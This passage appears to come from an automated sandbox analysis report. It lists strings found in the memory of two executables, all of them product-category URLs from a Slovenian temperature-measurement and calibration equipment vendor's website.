                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/kalibracijska-oprema-crno-telo-black
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/merilni-sistemi-za-temperaturo-calex
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/prikazovalniki-in-regulatorji-calex/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/prikazovalniki-za-fiksne-infrardece-
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/infrardeci-ir-merilniki/rocni-infrardeci-ir-merilniki-temper
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/izolirane-zice-termoparov/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/kabli-prikljucni-za-uporovna-tipala
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/kabli-termoclenov-za-termoelemente-
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/konektorji-za-prikljucitev-temperat
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/podaljski-za-termoclene-termoelemen
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kabli-zice-in-konektorji/zice-temperaturno-obstojne-za-prikl
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracije/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracijski-instrumenti-in-oprema/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/kalibracijski-instrumenti-in-oprema/kalibracijski-instrument
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 